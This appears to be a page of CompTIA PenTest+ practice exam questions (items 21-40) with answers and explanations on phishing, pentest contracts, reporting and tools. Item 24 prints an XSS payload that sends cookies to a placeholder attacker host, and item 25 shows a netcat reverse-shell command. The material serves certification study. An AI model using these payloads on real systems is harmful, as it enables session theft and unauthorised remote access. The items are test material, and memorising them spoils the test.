CompTIA PenTest+ Exam Questions

Page 2 of 25

21.

Through reconnaissance, an attacker has identified a group of top-ranking managers in their targeted organization. Their next move is to send all of them a specially crafted email that contains a malicious attachment in the form of an Excel financial report. 

Which of the following BEST describes the type of attack they are conducting?

  • Whaling

  • Spear phishing

  • XSS

  • CSRF

Correct answer: Whaling

Whaling is a type of phishing email attack that is used to target members of an organization who have credentials and access to the types of resources that could cause catastrophic damage to a business if compromised. 

Although spear phishing also refers to targeted phishing attacks, since the question specifically states that the attacker was targeting high-ranking managers, whaling is a better way to describe his attack than spear phishing. XSS and CSRF are not social engineering attacks.

22.

What is the primary reason why a pentester would recommend a client implement mandatory vacations?

  • To detect fraudulent activity hidden by employees

  • To ensure that employees are well-rested

  • To help increase employee satisfaction

  • To make sure that the company complies with local labor laws

Correct answer: To detect fraudulent activity hidden by employees

Mandatory vacations give an organization the opportunity to check that an employee's work is being completed properly. It can also give chances to other employees to learn that job role.

Employee health, satisfaction, and labor laws are not areas of expertise for pentesters.

23.

In which of the following situations would a pentester contact their emergency contact?

  • When a pentester discovers evidence of an ongoing threat

  • When a pentester needs to discuss contract terms

  • When a pentester is ready to deliver their final report

  • When a pentester needs access to a cloud management console

Correct answer: When a pentester discovers evidence of an ongoing threat

Pentesters need to have primary, technical, and emergency contacts. Emergency contacts are needed if the pentester discovers an ongoing or imminent threat.

Primary contacts are used when a pentester needs to discuss contract terms or when a pentester is ready to deliver their final report. 

Technical contacts are used when a pentester needs access to a cloud management console.

24.

An attacker found a SQL injection vulnerability on a targeted website. The SQL injection allows them to update the SQL database. One of the strings that the attacker injects into the database is as follows:

<img src=x onerror=this.src='https://evilsite.example.com/?c='+document.cookie>

What is the attacker attempting in ADDITION to the SQL injection?

  • Stored XSS

  • Lateral movement

  • Pass-the-hash

  • Reflected XSS

Correct answer: Stored XSS

They are attempting a stored, or persistent, XSS attack in the database to steal and redirect a session token. The stored XSS could later be accessed through a web interface by an administrative user. This would allow the attacker to steal the administrative user session.

Lateral movement is a technique for moving to a different system on a network. A pass-the-hash is a technique to gain unauthorized access by using hashed passwords. A reflected XSS attack is not stored in a database.

25.

What is this command used for?

nc <ip> <port> -e cmd.exe

  • To create a reverse shell on a Windows host

  • To send a file from a Windows host

  • To disable cmd.exe in a remote Windows host

  • To use netcat as a port scanner

Correct answer: To create a reverse shell on a Windows host

The nc tool provides the ability to execute programs upon successful connection. The nc <ip> <port> -e cmd.exe command will execute "cmd.exe" once it is connected to the remote IP, thus serving a shell to the remote host. The fact that the command is executed on the target and then connects back to the host makes it a reverse shell.

26.

A pentester has gained access to a single system account for an organization they are performing a penetration test on. They are focusing on gaining higher privileges than they currently have. 

Which of the following are they trying to accomplish?

  • Vertical escalation attack

  • Horizontal escalation attack

  • Directory traversal

  • Persistence

Correct answer: Vertical escalation attack

Privilege escalation is usually categorized into two types: vertical escalation and horizontal escalation. Vertical escalation attacks focus on gaining higher privileges.

Horizontal attacks move sideways to other accounts that have the same level of privileges. Directory traversal involves viewing files and directories outside of a web server's root directory. Persistence involves being able to connect with the target system at a later time.

27.

A pentest has determined that employees are susceptible to phishing attempts. Sometimes, mail spam filters and other security measures are a step behind the new phishing trends. 

What is another very effective way to lower the success rate of phishing attacks that a pentester should recommend as mitigation in their final report?

  • Employee security awareness training

  • Phishing filters on IDS and IPS

  • Hiding email addresses from public records

  • Disabling mail service

Correct answer: Employee security awareness training

Regular security awareness training could help the employees properly identify phishing emails. 

A social engineering test can provide information about employee behavior, policy compliance and enforcement, and security awareness, in addition to the information and access that it may provide through an organization’s security boundaries. If employees are well-trained to recognize malicious emails, this information could be protected.

28.

What is a good reason for conducting a retest after submitting the final report to the client?

  • To verify the effectiveness of a remediation effort

  • To learn additional information that can be useful in subsequent pentest projects

  • To ensure that the original test was performed correctly

  • To run the test live in front of stakeholders

Correct answer: To verify the effectiveness of a remediation effort

A client may ask for a retest after delivery of the report to test remediation efforts. For simple tests, the pentester can perform them free of charge based on their discretion.

29.

Which of the following topics is NOT typically part of a statement of work (SOW)?

  • Non-disclosure agreement

  • Scope of work

  • Payment schedule

  • Location of work

Correct answer: Non-disclosure agreement

A statement of work (SOW) is a key document for your penetration testing project. If you are at the stage of executing an SOW, it should mean that you have completed your vetting process and will be locking in your penetration testing vendor.

Key items in a penetration testing SOW:

  • Scope
  • Deliverables
  • Price
  • Completion date
  • Location of work
  • Payment schedule

A non-disclosure agreement (NDA) is typically a separate document and only covers the confidentiality of the information owned by the organization.

30.

A pentester wants to learn about current tactics, techniques, and strategies of adversaries. Which resource can they consult to get a general understanding of how incidents occurred across a wide variety of system types and how those incidents were mitigated?

  • MITRE ATT&CK framework

  • OWASP

  • PTES

  • OSSTMM

Correct answer: MITRE ATT&CK framework

The ATT&CK framework includes matrices for different tactics and techniques of adversaries. However, it is not a complete penetration testing program.

OWASP focuses on web application attacks. PTES is a penetration standards framework. OSSTMM is a penetration testing methodology.

31.

During reconnaissance, a pentester decides to use the following plugin/module to collect emails from a host:

"auxiliary/gather/search_email_collector"

Which tool are they using?

  • Metasploit

  • Burp

  • ZAP

  • Nmap

Correct answer: Metasploit

Metasploit is a powerful framework and consists of multiple modules. Auxiliary modules are usually scanners or other reconnaissance tools. This module is useful for automated information gathering during a penetration test.

Burp and ZAP are for web application scanning. Nmap is a network scanner.

32.

A pentester is performing a penetration test, and they manage to gain access to a Windows host. 

What tool should they consider using in order to extract credentials from the Windows host?

  • Mimikatz

  • netcat

  • WMIC

  • PowerShell

Correct answer: Mimikatz

Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs, and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket, and Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers.

The netcat utility is for reading from and writing to network connections using TCP or UDP. The Windows Management Instrumentation Command line (WMIC) is a software utility that allows users to perform Windows Management Instrumentation (WMI) operations with a command prompt. PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language.

33.

What remediation would help in the following situation? 

An attacker uses fraudulent emails to request a wire transfer.

  • Implementation of a new process

  • Implementation of new firewall rules

  • Implement an intrusion detection system 

  • Encryption of data in transit

Correct answer: Implementation of a new process

The client might implement a new process that lays out specific approved techniques for requesting wire transfers, thus removing ambiguity.

34.

Which of the following tools is used by a pentester for caller ID spoofing?

  • Viproy

  • BeEF

  • Authority

  • Needle

Correct answer: Viproy

Viproy is a pentesting tool for testing VoIP systems. It includes testing the Session Initiation Protocol (SIP), which allows for manipulating the caller ID.

The Browser Exploitation Framework (BeEF) is used for exploiting vulnerabilities in browsers.

Authority is a method of influence in social engineering.

Needle is a framework for testing the security of iOS applications.

35.

You have prepared detailed statistical data about the threats and vulnerabilities in your client's industry sector. Your goal is to provide your client with a clearer understanding of their security posture in comparison with similar companies. 

In which section of the report would you put this information so that it would be noted by everyone who reads it?

  • Conclusion

  • Findings and remediation

  • Appendix

  • Methodology

Correct answer: Conclusion

The conclusion is where you would provide a summary and make recommendations for future work. You might also include metrics and measures that help put the information presented in the report in the context of the organization or a peer group of similar organizations, or in a global context.

The findings and remediation section includes details about vulnerabilities and possible solutions. The appendix section can include code and glossary terms. The methodology section includes tools and techniques used.

36.

A pentester wants to enumerate unadvertised files and folders on a web server. 

Which tool is designed for this functionality?

  • Gobuster

  • OWASP ZAP

  • Kismet

  • BeEF

Correct answer: Gobuster

Gobuster is similar to DirBuster but is written in Go. It can enumerate files and folders of web applications.

OWASP ZAP is a web application security scanner but does not brute-force directory and file names by default. 

Kismet is a wireless network detector and packet analyzer. 

BeEF is a browser exploitation framework.

37.

While pentesting for a client, you notice that one of the vulnerability scanning tools could be fine-tuned to produce more comprehensive results. 

At what stage of the pentest should you share your ideas?

  • Lessons learned

  • Follow-up actions and retesting

  • Post-engagement cleanup

  • Client acceptance

Correct answer: Lessons learned

The lessons learned section is an internal session between the pentesting team members that is held after the successful completion of a pentest. In this session, the team usually discusses future methods and ways to improve the testing service they provide.

Follow-up actions and retesting involves conducting additional tests. Post-engagement cleanup can include removing any tools or changes made during the tests. Client acceptance is formal acknowledgment from the client that they received the report.

38.

What is the purpose of the following PowerShell cmdlet?

Get-WmiObject -Query "SELECT * FROM Win32_Product"

  • To retrieve information about software products installed on the system

  • To list scheduled tasks

  • To view all running processes

  • To display information about active network connections

Correct answer: To retrieve information about software products installed on the system

The Get-WmiObject cmdlet is used to retrieve WMI information, such as software and hardware. The query selects all properties from the Win32_Product class.

The Get-ScheduledTask cmdlet is used to  list scheduled tasks. 

The Get-Process cmdlet is used to view all running processes. 

The NetStat -ano cmdlet is used to display network connections.

39.

How should a situation be addressed in which the machines you were targeting for your client's pentest were hosted by another entity?

  • Approval would usually need to be acquired from the hosting company or the cloud provider

  • Approval does not need to be granted as long as the assets belong to your client

  • Approval is required only if the assets were hosted in specific countries

  • If the client approves it, then there is no additional need for approval

Correct answer: Approval would usually need to be acquired from the hosting company or the cloud provider

If the targets are hosted in a third-party environment, such as a cloud service provider (CSP), testing is not only subject to the company’s policies, but is also subject to the third party’s acceptable use policies. For instance, Amazon Web Services (AWS) requires that tenants submit pentesting request forms to receive authorization prior to penetration testing to or from any AWS resource.

40.

Which of the following sqlmap commands is incorrect and will NOT work?

  • sqlmap.py --host "https://example.com/article.php?id=16" --dbms=MYSQL

  • sqlmap.py -u "https://example.com/article.php?id=16" --dbms=MYSQL

  • sqlmap.py -u "https://example.com/article.php?id=16"

  • sqlmap.py -u "https://example.com/article.php?id=16" --dbms=MYSQL  --level=3 --risk=3

Correct answer: sqlmap.py --host "https://example.com/article.php?id=16" --dbms=MYSQL 

When running the sqlmap command, you would need to, most importantly, provide it with a target or a URL to use. The proper flag for this is "-u." --host is also a legitimate flag but is used to specify the HTTP Host header value.